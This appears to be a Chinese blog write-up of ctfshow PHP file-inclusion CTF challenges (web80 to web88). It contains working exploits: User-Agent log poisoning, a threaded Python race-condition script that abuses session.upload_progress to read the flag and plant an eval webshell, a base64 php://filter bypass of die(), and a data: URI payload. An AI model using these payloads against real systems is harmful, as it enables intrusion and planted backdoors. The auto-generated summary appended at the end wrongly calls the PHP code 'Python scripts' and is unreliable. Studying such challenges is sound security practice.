ctfshow文件包含篇

web80-81

web80

在这里插入图片描述
过滤了data协议,php

这题新思路,伪造UA写入php代码,然后包含日志文件来进行getshell,
当然这题还可以用大小写绕,因为str_replace区分大小写

?file=/var/log/nginx/access.log

在这里插入图片描述
查flag即可
在这里插入图片描述

web81

在这里插入图片描述

web82-86

在这里插入图片描述
过滤了.不能通过文件包含来进行绕过
利用session.upload_progress进行文件包含
不多说了,WMCTF也做过

import io
import sys
import requests
import threading

sessid = 'penson'
url='http://ffd7ccbf-4d5a-4096-a5eb-7773d340c7ac.chall.ctf.show/'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            url=url,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat flag.php');fputs(fopen('shell.php','w'),'<?php @eval($_POST[penson])?>');?>"},
            files={"file":('penson.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'{url}?file=/tmp/sess_{sessid}')
        if 'flag{' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()

    READ(session)

运行完事,
在这里插入图片描述
成功写入shell
查看flag,不知道这环境什么鬼,cat不能用
在这里插入图片描述

web 83

在这里插入图片描述
多了两函数,无影响,依然可以用那个条件竞争来进行文件包含
在这里插入图片描述
写shell还是非常快的

web 87

1、ctfshow web87

Penson

1、ctfshowweb87

图片

看到这个die就很容易想到绕过死亡exit了

但是由于他过滤了php,data,但是这个又不是正则匹配,而后面加了个urldecode

https://www.anquanke.com/post/id/202510#h3-4

直接用双编码

既然没禁base64那就直接base64

图片

在base64解密时会忽略不可识别的字符,phpdie长度为6,要8个为一组,凑齐

然后就能将这个die给base64解码

再访问penson.php

图片

getshell

web88

在这里插入图片描述

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤一堆东西,但是没有过滤:和data协议
在这里插入图片描述

data:text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTsgPz4
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
文件包含是一种常见的安全漏洞,攻击者可以通过利用该漏洞来读取、执行或者包含服务器上的文件。根据提供的引用内容,我们可以看到三个不同的Python脚本,它们都涉及到文件包含漏洞。 在引用\[1\]中的Python脚本中,如果通过GET请求传递了一个名为"file"的参数,脚本会将该参数的值作为文件名,并通过include函数将该文件包含进来。然而,脚本中使用了正则表达式来检查文件名中是否包含一些特殊字符,如果包含则会终止脚本执行并输出"error"。这是一种简单的防护措施,但并不完全可靠。 在引用\[2\]中的Python脚本中,与引用\[1\]相比,增加了一些字符串替换操作。这些替换操作将文件名中的"php"、"data"、":"和"."替换为"???"。这样做的目的可能是为了绕过引用\[1\]中的正则表达式检查,使得攻击者可以包含一些被禁止的文件。 在引用\[3\]中的Python脚本中,与引用\[1\]和引用\[2\]相比,没有进行任何的文件名检查或替换操作。如果通过GET请求传递了一个名为"file"的参数,脚本会直接将该参数的值作为文件名,并通过include函数将该文件包含进来。 综上所述,这些Python脚本都存在文件包含漏洞,攻击者可以通过构造恶意的文件名来读取、执行或者包含服务器上的文件。为了防止此类漏洞的利用,应该对用户输入进行严格的验证和过滤,确保只包含可信的文件。 #### 引用[.reference_title] - *1* *2* *3* [ctfshow文件包含](https://blog.csdn.net/njh18790816639/article/details/115582591)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值